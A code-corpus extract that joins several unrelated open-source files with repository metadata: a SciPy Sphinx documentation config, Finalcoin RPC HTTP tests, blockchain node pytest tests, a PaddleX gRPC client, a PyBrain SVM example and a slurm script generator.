# -----------------------------------------------------------------------------
# General configuration
# -----------------------------------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
sys.path.insert(0, os.path.abspath('../sphinxext'))
sys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))
import numpydoc.docscrape as np_docscrape # noqa:E402
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'numpydoc',
'sphinx_panels',
'scipyoptdoc',
'doi_role',
'matplotlib.sphinxext.plot_directive',
]
# Determine if the matplotlib has a recent enough version of the
# plot_directive.
from matplotlib.sphinxext import plot_directive
if plot_directive.__version__ < 2:
raise RuntimeError("You need a recent enough version of matplotlib")
# Do some matplotlib config in case users have a matplotlibrc that will break
# things
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
plt.ioff()
# sphinx-panels shouldn't add bootstrap css since the pydata-sphinx-theme
# already loads it
panels_add_bootstrap_css = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'SciPy'
copyright = '2008-%s, The SciPy community' % date.today().year
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
import scipy
version = re.sub(r'\.dev-.*$', r'.dev', scipy.__version__)
release = scipy.__version__
print("%s (VERSION %s)" % (project, version))
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# The reST default role (used for this markup: `text`) to use for all documents.
default_role = "autolink"
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_dirs = []
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# Ensure all our internal links work
nitpicky = True
nitpick_ignore = [
# This ignores errors for classes (OptimizeResults, sparse.dok_matrix)
# which inherit methods from `dict`. missing references to builtins get
# ignored by default (see https://github.com/sphinx-doc/sphinx/pull/7254),
# but that fix doesn't work for inherited methods.
("py:class", "a shallow copy of D"),
("py:class", "a set-like object providing a view on D's keys"),
("py:class", "a set-like object providing a view on D's items"),
("py:class", "an object providing a view on D's values"),
("py:class", "None. Remove all items from D."),
("py:class", "(k, v), remove and return some (key, value) pair as a"),
("py:class", "None. Update D from dict/iterable E and F."),
("py:class", "v, remove specified key and return the corresponding value."),
]
exclude_patterns = [ # glob-style
]
# be strict about warnings in our examples, we should write clean code
# (exceptions permitted for pedagogical purposes below)
warnings.resetwarnings()
warnings.filterwarnings('error')
# allow these and show them
warnings.filterwarnings('default', module='sphinx') # internal warnings
# global weird ones that can be safely ignored
for key in (
r"'U' mode is deprecated", # sphinx io
r"OpenSSL\.rand is deprecated", # OpenSSL package in linkcheck
r"Using or importing the ABCs from", # 3.5 importlib._bootstrap
r"'contextfunction' is renamed to 'pass_context'", # Jinja
):
warnings.filterwarnings( # deal with other modules having bad imports
'ignore', message=".*" + key, category=DeprecationWarning)
warnings.filterwarnings( # matplotlib<->pyparsing issue
'ignore', message="Exception creating Regex for oneOf.*",
category=SyntaxWarning)
# warnings in examples (mostly) that we allow
# TODO: eventually these should be eliminated!
for key in (
'invalid escape sequence', # numpydoc 0.8 has some bad escape chars
'The integral is probably divergent', # stats.mielke example
'underflow encountered in square', # signal.filtfilt underflow
'underflow encountered in multiply', # scipy.spatial.HalfspaceIntersection
'underflow encountered in nextafter', # tuterial/interpolate.rst
# stats.skewnorm, stats.norminvgauss, stats.gaussian_kde,
# tutorial/stats.rst (twice):
'underflow encountered in exp',
):
warnings.filterwarnings(
'once', message='.*' + key)
# -----------------------------------------------------------------------------
# HTML output
# -----------------------------------------------------------------------------
html_theme = 'pydata_sphinx_theme'
html_logo = '_static/logo.svg'
html_favicon = '_static/favicon.ico'
html_theme_options = {
"logo_link": "index",
"github_url": "https://github.com/scipy/scipy",
"navbar_start": ["navbar-logo", "version"],
}
if 'versionwarning' in tags:
# Specific to docs.scipy.org deployment.
# See https://github.com/scipy/docs.scipy.org/blob/master/_static/versionwarning.js_t
src = ('var script = document.createElement("script");\n'
'script.type = "text/javascript";\n'
'script.src = "/doc/_static/versionwarning.js";\n'
'document.head.appendChild(script);');
html_context = {
'VERSIONCHECK_JS': src,
'versionwarning': True
}
html_js_files = ['versioncheck.js']
else:
html_context = {
'versionwarning': False
}
html_title = "%s v%s Manual" % (project, version)
html_static_path = ['_static']
html_last_updated_fmt = '%b %d, %Y'
html_css_files = [
"scipy.css",
]
# html_additional_pages = {
# 'index': 'indexcontent.html',
# }
html_additional_pages = {}
html_use_modindex = True
html_domain_indices = False
html_copy_source = False
html_file_suffix = '.html'
htmlhelp_basename = 'scipy'
mathjax_path = "scipy-mathjax/MathJax.js?config=scipy-mathjax"
# -----------------------------------------------------------------------------
# LaTeX output
# -----------------------------------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
_stdauthor = 'Written by the SciPy community'
latex_documents = [
('index', 'scipy-ref.tex', 'SciPy Reference Guide', _stdauthor, 'manual'),
# ('user/index', 'scipy-user.tex', 'SciPy User Guide',
# _stdauthor, 'manual'),
]
# Not available on many systems:
latex_use_xindy = False
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = False
# fix issues with Unicode characters
latex_engine = 'xelatex'
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': r'''
% In the parameters etc. sections, align uniformly, and adjust label emphasis
\usepackage{expdlist}
\let\latexdescription=\description
\let\endlatexdescription=\enddescription
\renewenvironment{description}
{\renewenvironment{description}
{\begin{latexdescription}%
[\setleftmargin{50pt}\breaklabel\setlabelstyle{\bfseries}]%
}%
{\end{latexdescription}}%
\begin{latexdescription}%
[\setleftmargin{15pt}\breaklabel\setlabelstyle{\bfseries\itshape}]%
}%
{\end{latexdescription}}
% Fix bug in expdlist's modified \@item
\usepackage{etoolbox}
\makeatletter
\patchcmd\@item{{\@breaklabel} }{{\@breaklabel}}{}{}
% Fix bug in expdlist's way of breaking the line after long item label
\def\breaklabel{%
\def\@breaklabel{%
\leavevmode\par
% now a hack because Sphinx inserts \leavevmode after term node
\def\leavevmode{\def\leavevmode{\unhbox\voidb@x}}%
}%
}
\makeatother
% Make Examples/etc section headers smaller and more compact
\titlespacing*{\paragraph}{0pt}{1ex}{0pt}
% Save vertical space in parameter lists and elsewhere
\makeatletter
\renewenvironment{quote}%
{\list{}{\topsep=0pt\relax
\parsep \z@ \@plus\p@}%
\item\relax}%
{\endlist}
\makeatother
% Avoid small font size in code-blocks
\fvset{fontsize=auto}
% Use left-alignment per default in tabulary rendered tables
\newcolumntype{T}{L}
% Get some useful deeper bookmarks and table of contents in PDF
\setcounter{tocdepth}{1}
% Fix: ≠ is unknown to XeLaTeX's default font Latin Modern
\usepackage{newunicodechar}
\newunicodechar{≠}{\ensuremath{\neq}}
% Get PDF to use maximal depth bookmarks
\hypersetup{bookmarksdepth=subparagraph}
% reduce hyperref warnings
\pdfstringdefDisableCommands{%
\let\sphinxupquote\empty
\let\sphinxstyleliteralintitle\empty
\let\sphinxstyleemphasis\empty
}
''',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
# benefit from Sphinx built-in workaround of LaTeX's list limitations
'maxlistdepth': '12',
# reduce TeX warnings about underfull boxes in the index
'printindex': r'\raggedright\printindex',
# avoid potential problems arising from erroneous mark-up of the
# \mathbf{\Gamma} type
'passoptionstopackages': r'\PassOptionsToPackage{no-math}{fontspec}',
}
# -----------------------------------------------------------------------------
# Intersphinx configuration
# -----------------------------------------------------------------------------
intersphinx_mapping = {
'python': ('https://docs.python.org/dev', None),
'numpy': ('https://numpy.org/devdocs', None),
'neps': ('https://numpy.org/neps', None),
'matplotlib': ('https://matplotlib.org', None),
'asv': ('https://asv.readthedocs.io/en/stable/', None),
}
# -----------------------------------------------------------------------------
# Numpy extensions
# -----------------------------------------------------------------------------
# If we want to do a phantom import from an XML file for all autodocs
phantom_import_file = 'dump.xml'
# Generate plots for example sections
numpydoc_use_plots = True
np_docscrape.ClassDoc.extra_public_methods = [ # should match class.rst
'__call__', '__mul__', '__getitem__', '__len__',
]
# -----------------------------------------------------------------------------
# Autosummary
# -----------------------------------------------------------------------------
autosummary_generate = True
# -----------------------------------------------------------------------------
# Autodoc
# -----------------------------------------------------------------------------
autodoc_default_options = {
'inherited-members': None,
}
autodoc_typehints = 'none'
# -----------------------------------------------------------------------------
# Coverage checker
# -----------------------------------------------------------------------------
coverage_ignore_modules = r"""
""".split()
coverage_ignore_functions = r"""
test($|_) (some|all)true bitwise_not cumproduct pkgload
generic\.
""".split()
coverage_ignore_classes = r"""
""".split()
coverage_c_path = []
coverage_c_regexes = {}
coverage_ignore_c_items = {}
#------------------------------------------------------------------------------
# Matplotlib plot_directive options
#------------------------------------------------------------------------------
plot_pre_code = """
import numpy as np
np.random.seed(123)
"""
plot_include_source = True
plot_formats = [('png', 96), 'pdf']
plot_html_show_formats = False
plot_html_show_source_link = False
import math
phi = (math.sqrt(5) + 1)/2
font_size = 13*72/96.0 # 13 px
plot_rcparams = {
'font.size': font_size,
'axes.titlesize': font_size,
'axes.labelsize': font_size,
'xtick.labelsize': font_size,
'ytick.labelsize': font_size,
'legend.fontsize': font_size,
'figure.figsize': (3*phi, 3),
'figure.subplot.bottom': 0.2,
'figure.subplot.left': 0.2,
'figure.subplot.right': 0.9,
'figure.subplot.top': 0.85,
'figure.subplot.wspace': 0.4,
'text.usetex': False,
}
# -----------------------------------------------------------------------------
# Source code links
# -----------------------------------------------------------------------------
import re
import inspect
from os.path import relpath, dirname
for name in ['sphinx.ext.linkcode', 'linkcode', 'numpydoc.linkcode']:
try:
__import__(name)
extensions.append(name)
break
except ImportError:
pass
else:
print("NOTE: linkcode extension not found -- no links to source generated")
def linkcode_resolve(domain, info):
"""
Determine the URL corresponding to Python object
"""
if domain != 'py':
return None
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except Exception:
return None
try:
fn = inspect.getsourcefile(obj)
except Exception:
fn = None
if not fn:
try:
fn = inspect.getsourcefile(sys.modules[obj.__module__])
except Exception:
fn = None
if not fn:
return None
try:
source, lineno = inspect.getsourcelines(obj)
except Exception:
lineno = None
if lineno:
linespec = "#L%d-L%d" % (lineno, lineno + len(source) - 1)
else:
linespec = ""
startdir = os.path.abspath(os.path.join(dirname(scipy.__file__), '..'))
fn = relpath(fn, start=startdir).replace(os.path.sep, '/')
if fn.startswith('scipy/'):
m = re.match(r'^.*dev0\+([a-f0-9]+)$', scipy.__version__)
if m:
return "https://github.com/scipy/scipy/blob/%s/%s%s" % (
m.group(1), fn, linespec)
elif 'dev' in scipy.__version__:
return "https://github.com/scipy/scipy/blob/master/%s%s" % (
fn, linespec)
else:
return "https://github.com/scipy/scipy/blob/v%s/%s%s" % (
scipy.__version__, fn, linespec)
else:
return None
| 31.318982 | 89 | 0.615909 |
acf699b0602ae5f7f6bc5f916ff63475e3be9513 | 4,873 | py | Python | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Finalcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import FinalcoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (FinalcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.supports_cli = False
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = f'{url.username}:{url.password}'
headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": f"Basic {str_to_b64str(authpair)}", "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": f"Basic {str_to_b64str(authpair)}", "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is None #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = f'{urlNode1.username}:{urlNode1.password}'
headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = f'{urlNode2.username}:{urlNode2.password}'
headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #connection must be closed because finalcoind should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', f'/{"x"*1000}', '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', f'/{"x"*10000}', '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| 44.3 | 116 | 0.640468 |
acf69c45726ce4723dd7b4917a34968ecaf3a7da | 6,182 | py | Python | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 18 | 2021-11-30T04:02:13.000Z | 2022-03-24T12:33:57.000Z | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 1 | 2022-02-04T17:07:38.000Z | 2022-02-04T17:07:38.000Z | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 5 | 2022-01-31T05:28:13.000Z | 2022-03-08T17:25:31.000Z | import pytest
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
AccountState, Block, BlockMessageUpdate, CoinTransferSignedChangeRequest, CoinTransferSignedChangeRequestMessage
)
from node.blockchain.inner_models.signed_change_request_message import CoinTransferTransaction
from node.blockchain.models import AccountState as DBAccountState
from node.blockchain.models.block import Block as ORMBlock
from node.blockchain.types import AccountLock, Signature, Type
from node.core.exceptions import ValidationError
from node.core.utils.cryptography import is_signature_valid
@pytest.mark.django_db
def test_add_block_from_block_message(coin_transfer_block_message, primary_validator_key_pair, treasury_amount):
blockchain_facade = BlockchainFacade.get_instance()
expected_block_number = blockchain_facade.get_next_block_number()
expected_identifier = blockchain_facade.get_next_block_identifier()
block = blockchain_facade.add_block_from_block_message(
message=coin_transfer_block_message,
signing_key=primary_validator_key_pair.private,
validate=False,
)
assert block.signer == primary_validator_key_pair.public
assert isinstance(block.signature, str)
assert is_signature_valid(
block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
)
message = block.message
assert message.number == expected_block_number
assert message.identifier == expected_identifier
assert message.type == Type.COIN_TRANSFER
assert message == coin_transfer_block_message
# Test rereading the block from the database
orm_block = ORMBlock.objects.get(_id=expected_block_number)
block = Block.parse_raw(orm_block.body)
assert block.signer == primary_validator_key_pair.public
assert isinstance(block.signature, str)
assert is_signature_valid(
block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
)
message = block.message
assert message.number == expected_block_number
assert message.identifier == expected_identifier
assert message.type == Type.COIN_TRANSFER
assert message == coin_transfer_block_message
# Test account state write-through cache
assert DBAccountState.objects.count() == 4
request = coin_transfer_block_message.request
account_state = DBAccountState.objects.get(_id=request.signer)
assert account_state.account_lock == request.make_hash()
assert account_state.balance == treasury_amount - request.message.get_total_amount()
assert account_state.node is None
@pytest.mark.usefixtures('base_blockchain')
def test_add_block_from_signed_change_request(
treasure_coin_transfer_signed_change_request, regular_node, self_node, primary_validator_key_pair, treasury_amount
):
blockchain_facade = BlockchainFacade.get_instance()
expected_block_number = blockchain_facade.get_next_block_number()
expected_identifier = blockchain_facade.get_next_block_identifier()
block = blockchain_facade.add_block_from_signed_change_request(
treasure_coin_transfer_signed_change_request, signing_key=primary_validator_key_pair.private
)
assert block.signer == primary_validator_key_pair.public
assert isinstance(block.signature, str)
assert is_signature_valid(
block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
)
message = block.message
assert message.number == expected_block_number
assert message.identifier == expected_identifier
assert message.type == Type.COIN_TRANSFER
assert message.request == treasure_coin_transfer_signed_change_request
expected_message_update = BlockMessageUpdate(
accounts={
treasure_coin_transfer_signed_change_request.signer:
AccountState(
balance=treasury_amount - treasure_coin_transfer_signed_change_request.message.get_total_amount(),
account_lock=treasure_coin_transfer_signed_change_request.make_hash(),
),
regular_node.identifier:
AccountState(
balance=100,
account_lock=None,
),
self_node.identifier:
AccountState(
balance=4,
account_lock=None,
),
}
)
assert message.update == expected_message_update
orm_block = ORMBlock.objects.get(_id=expected_block_number)
block = Block.parse_raw(orm_block.body)
assert block.signer == primary_validator_key_pair.public
assert isinstance(block.signature, str)
assert is_signature_valid(
block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
)
message = block.message
assert message.number == expected_block_number
assert message.identifier == expected_identifier
assert message.type == Type.COIN_TRANSFER
assert message.request == treasure_coin_transfer_signed_change_request
assert message.update == expected_message_update
@pytest.mark.usefixtures('base_blockchain')
def test_add_block_from_signed_change_request_account_lock_validation(
treasury_account_key_pair, regular_node, self_node
):
blockchain_facade = BlockchainFacade.get_instance()
account_lock = AccountLock('0' * 64)
assert blockchain_facade.get_account_lock(treasury_account_key_pair.public) != account_lock
message = CoinTransferSignedChangeRequestMessage(
account_lock=account_lock,
txs=[
CoinTransferTransaction(recipient='1' * 64, amount=10),
CoinTransferTransaction(recipient=self_node.identifier, amount=self_node.fee, is_fee=True),
],
)
request = CoinTransferSignedChangeRequest.create_from_signed_change_request_message(
message=message,
signing_key=treasury_account_key_pair.private,
)
with pytest.raises(ValidationError, match='Invalid account lock'):
blockchain_facade.add_block_from_signed_change_request(request)
| 43.535211 | 118 | 0.763022 |
acf69c6a7e90bd71bea74fd1c754cab0c79561a8 | 5,342 | py | Python | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | 4 | 2021-05-07T00:50:02.000Z | 2022-03-23T07:57:36.000Z | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | null | null | null | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | 4 | 2021-05-04T09:35:45.000Z | 2021-12-08T08:14:50.000Z | import os,sys
# sys.path.append('../Packages')
import grpc
import os
import psutil
import signal
def getAllPid():
pid_dict = {}
pids = psutil.pids()
for pid in pids:
p = psutil.Process(pid)
pid_dict[pid] = p.name()
return pid_dict
def kill(pid):
try:
kill_pid = os.kill(pid, signal.SIGABRT)
print('已杀死pid为{}的进程, 返回值是:{}'.format(pid, kill_pid))
except Exception as e:
print('没有如此进程!!!')
def app_kill():
kill_list = []
dic = getAllPid()
for t in dic.keys():
if dic[t] == "App.exe":
kill_list.append(t)
for i in range(len(kill_list)-1):
kill(kill_list[i])
# sys.path.append(os.path.join(os.getcwd(),'../example'))
from example import PaddleXserver_pb2
from example import PaddleXserver_pb2_grpc
import cv2
app_kill()
import paddlex as pdx
import numpy as np
import base64
def image_to_base64(img):
img_str = cv2.imencode('.jpg', img)[1].tostring() # 将图片编码成流数据,放到内存缓存中,然后转化成string格式
b64_code = base64.b64encode(img_str) # 编码成base64
img_str=str(b64_code, encoding='utf-8')
return img_str
def base64_to_image(img):
img_b64decode = base64.b64decode(img) # base64解码
img_array = np.fromstring(img_b64decode,np.uint8) # 转换np序列
img = cv2.imdecode(img_array,cv2.COLOR_BGR2RGB) # 转换Opencv格式
return img
class Predict_det:
'''
客户端预测对象
'''
def __init__(self,channel,model_dir,use_gpu,gpu_id = '0'):
# 链接rpc 服务器
self.channel = grpc.insecure_channel(channel) #str
#调用 rpc 服务
#stub用来调用服务端方法
self.stub = PaddleXserver_pb2_grpc.PaddleXserverStub(self.channel)
self.model_dir = model_dir
self.use_gpu = use_gpu
self.gpu_id = gpu_id
def load_model(self):
'''
将参数传给服务端,加载模型返回加载结果
'''
# print('use model_dir'+self.model_dir)
respone = self.stub.paddlex_init(PaddleXserver_pb2.paddlex_init_cmd(
model_dir = self.model_dir,
use_gpu = self.use_gpu,
gpu_id = self.gpu_id
))
return respone.init_result
def pdx_predict_det(self,img):
'''
目标检测接口
将帧图片传给服务端预测返回筛选之后的boxes
将poxes的结果可视化
'''
or_img = img
img = image_to_base64(img)
respone = self.stub.paddlex_predict_det(PaddleXserver_pb2.image(
_image = img
))
result = []
for value in respone.boxes:
dict_temp = {}
dict_temp['category_id'] = value.category_id
dict_temp['bbox'] = []
dict_temp['bbox'].append(value.bbox.xmin)
dict_temp['bbox'].append(value.bbox.ymin)
dict_temp['bbox'].append(value.bbox.width)
dict_temp['bbox'].append(value.bbox.height)
dict_temp['score'] = value.score
dict_temp['category'] = value.category
result.append(dict_temp)
visualize_img = pdx.det.visualize(or_img,result,threshold=0,save_dir=None)
return visualize_img
def pdx_predict_det_seg(self,img):
'''
实例分割接口
将帧图发送服务端,返回结果
可视化结果
'''
or_img = img
img = image_to_base64(img)
respone = self.stub.paddlex_predict_det_seg(PaddleXserver_pb2.image(
_image = img
))
result = []
for value in respone.boxes_seg:
dict_temp = {}
dict_temp['category_id'] = value.category_id
dict_temp['bbox'] = []
dict_temp['bbox'].append(value.bbox.xmin)
dict_temp['bbox'].append(value.bbox.ymin)
dict_temp['bbox'].append(value.bbox.width)
dict_temp['bbox'].append(value.bbox.height)
dict_temp['score'] = value.score
dict_temp['mask'] = base64_to_image(value._mask)
dict_temp['category'] = value.category
result.append(dict_temp)
visualize_img = pdx.det.visualize(or_img,result,threshold=0,save_dir=None)
return visualize_img
def pdx_predict_cls(self,img):
'''
图像分类接口
将帧图发送服务端,返回结果一个
'''
img = image_to_base64(img)
respone = self.stub.paddlex_predict_cls(PaddleXserver_pb2.image(
_image = img
))
result = []
dict_temp = {}
dict_temp['category_id'] = respone.category_id
dict_temp['score'] = respone.score
dict_temp['category'] = respone.category
result.append(dict_temp)
return result
def pdx_predict_seg(self,img):
'''
语义分割接口
将帧图发送服务端,返回一个分割结果
'''
or_img = img
img = image_to_base64(img)
respone = self.stub.paddlex_predict_seg(PaddleXserver_pb2.image(
_image = img
))
dict_temp = {}
dict_temp['score_map'] = []
for value in respone._score_map:
temp = base64_to_image(value.value)
temp = temp[:,:,np.newaxis]/255
dict_temp['score_map'].append(temp.astype('float32'))
dict_temp['score_map'] = np.concatenate(dict_temp['score_map'],axis=2)
dict_temp['label_map'] = base64_to_image(respone.label_map)
visualize_img = pdx.seg.visualize(or_img, dict_temp, weight=respone.set_threshold, save_dir=None, color=None)
return visualize_img
| 29.351648 | 117 | 0.602396 |
acf69da83b911af6910b3464568ea3b4c2be0b6c | 2,246 | py | Python | examples/supervised/neuralnets+svm/example_svm.py | rueckstiess/pybrain | 8fc950d700aaf9d5012911d53714afb4b18225c3 | [
"BSD-3-Clause"
] | 3 | 2015-03-21T21:42:28.000Z | 2018-07-12T04:21:32.000Z | examples/supervised/neuralnets+svm/example_svm.py | bayerj/pybrain | cfef28152bd60cedfdae5390c599d4fe4d2ec095 | [
"BSD-3-Clause"
] | null | null | null | examples/supervised/neuralnets+svm/example_svm.py | bayerj/pybrain | cfef28152bd60cedfdae5390c599d4fe4d2ec095 | [
"BSD-3-Clause"
] | null | null | null | """ Example script for SVM classification using PyBrain and LIBSVM
CAVEAT: Needs the libsvm Python file svm.py and the corresponding (compiled) library to reside in the Python path! """
__author__ = "Martin Felder"
__version__ = '$Id$'
import pylab as p
import logging
from os.path import join
# load the necessary components
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.structure.modules.svmunit import SVMUnit
from pybrain.supervised.trainers.svmtrainer import SVMTrainer
# import some local stuff
from datasets import generateClassificationData, plotData, generateGridData
logging.basicConfig(level=logging.INFO, filename=join('.','testrun.log'),
format='%(asctime)s %(levelname)s %(message)s')
logging.getLogger('').addHandler(logging.StreamHandler())
# load the training and test data sets
trndata = generateClassificationData(20, nClasses=2)
tstdata = generateClassificationData(100, nClasses=2)
# initialize the SVM module and a corresponding trainer
svm = SVMUnit()
trainer = SVMTrainer( svm, trndata )
# train the with fixed meta-parameters
log2C=0. # degree of slack
log2g=1.1 # width of RBF kernels
trainer.train( log2C=log2C, log2g=log2g )
# alternatively, could train the SVM using design-of-experiments grid search
##trainer.train( search="GridSearchDOE" )
# pass data sets through the SVM to get performance
trnresult = percentError( svm.activateOnDataset(trndata), trndata['target'] )
tstresult = percentError( svm.activateOnDataset(tstdata), tstdata['target'] )
print "sigma: %7g, C: %7g, train error: %5.2f%%, test error: %5.2f%%" % (2.0**log2g, 2.0**log2C, trnresult, tstresult)
# generate a grid dataset
griddat, X, Y = generateGridData(x=[-4,8,0.1],y=[-2,3,0.1])
# pass the grid through the SVM, but this time get the raw distance
# from the boundary, not the class
Z = svm.activateOnDataset(griddat, values=True)
# the output format is a bit weird... make it into a decent array
Z = p.array([z.values()[0] for z in Z]).reshape(X.shape)
# make a 2d plot of training data with an decision value contour overlay
fig = p.figure()
plotData(trndata)
p.contourf(X, Y, Z)
p.show()
| 36.819672 | 121 | 0.735975 |
acf69f785e2d545dc652e7c244a1fb779b55d2f4 | 5,082 | py | Python | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | 2 | 2021-09-16T14:47:43.000Z | 2021-10-31T04:55:16.000Z | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | null | null | null | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | 2 | 2020-08-19T20:01:14.000Z | 2020-12-21T21:24:12.000Z | '''
Generate slurm job submission scripts - one per condition
'''
import argparse, os, sys, errno, subprocess, csv
from pyvarco import CombinationCollector
seed_offset = 2000
default_num_replicates = 30
job_time_request = "48:00:00"
job_memory_request = "4G"
job_name = "avida"
executable = "avida"
base_script_filename = './base_script.txt'
# Create combo object to collect all conditions we'll run
combos = CombinationCollector()
combos.register_var('EVENT_FILE')
combos.add_val('EVENT_FILE', [\
'events-const-all.cfg', \
'events-const-all-equal.cfg', \
'events-const-all-greater.cfg', \
'events-chg-u300.cfg', \
'events-chg-u300-equal.cfg', \
'events-chg-u300-greater.cfg', \
'events-chg-u30.cfg', \
'events-chg-u30-equal.cfg', \
'events-chg-u30-greater.cfg', \
])
# Load in the base slurm file
with open(base_script_filename, 'r') as fp:
base_sub_script = fp.read()
'''
